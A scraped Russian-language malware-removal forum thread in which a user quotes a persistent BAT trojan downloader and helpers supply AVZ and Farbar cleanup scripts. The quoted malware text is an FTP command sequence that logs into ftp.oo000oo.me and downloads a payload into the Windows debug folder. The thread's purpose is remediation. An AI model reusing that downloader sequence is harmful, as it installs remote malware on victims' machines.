Здравствуйте! ESETOnlineScanner_RUS обнаружил- (((BAT/TrojanDownloader.Ftp.NSQ))). При открытии файла такой текстopen ftp.oo000oo.me test 1433get s.dat c:\windows\debug\item.dat bye). Файл находится в:C:\Windows\System32\P ESETOnlineScanner удаляет его,но безрезультатно. Фай удаляется в ручную,но при перезагрузке компьютера, восстанавливается. Что это и как его удалить? Спасибо!
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
QuarantineFile('c:\windows\debug\item.dat', '');
ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
DeleteFile('c:\windows\debug\item.dat');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
RebootWindows(true);
end.
Где отчеты?После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению
Как на счет угроз???Где отчеты?
Как на счет угроз???Farbar Recovery Scan Tool- угрозы: Antivirus scan for 4dad5793331e5929780ef1dc79eb48f6d393490f347b632daa7e5d53c50e5495 at 2017-07-14 12:02:34 UTC - VirusTotal показал 2 угрозы: 1).Antiy-AVL Trojan/Generic.ASVCS3S.1E5 20170714 и 2).Bkav W32.HfsAtITA.1719 20170714
Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{8b895855-b60f-4017-8301-cd71eb60a96a} <==== ATTENTION (Restriction - IP)
BHO: No Name -> {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} -> No File
BHO-x32: No Name -> {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} -> No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
Toolbar: HKU\S-1-5-21-1387383663-2430255384-2943498389-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-1387383663-2430255384-2943498389-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} - No File
FF Extension: (SuperMegaBest.com) - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\jid1-n5ARdBzHkUEdAA@jetpack.xpi [2014-05-05] [not signed]
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => -> No File
ContextMenuHandlers01: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP\System\aimp_menu64.dll -> No File
ContextMenuHandlers01: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File
ContextMenuHandlers04: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP\System\aimp_menu64.dll -> No File
ContextMenuHandlers06: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File
Task: {B3888384-40A4-49E7-8CAC-185AA82B46B7} - \Mysa -> No File <==== ATTENTION
EmptyTemp:
Reboot:
End::
Один удалите, один оставьте - Чистка системы после некорректного удаления антивируса.Avast Free Antivirus
Norton Internet Security
Ложное срабатывание.Как на счет угроз???
Вы нажали дваждыНажмите Fix один раз (!)
?Сообщите что сейчас с проблемой
Все утилиты лечения следует запускать от имени администратора.не от имени администратора
Да.Антивирус отключить?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?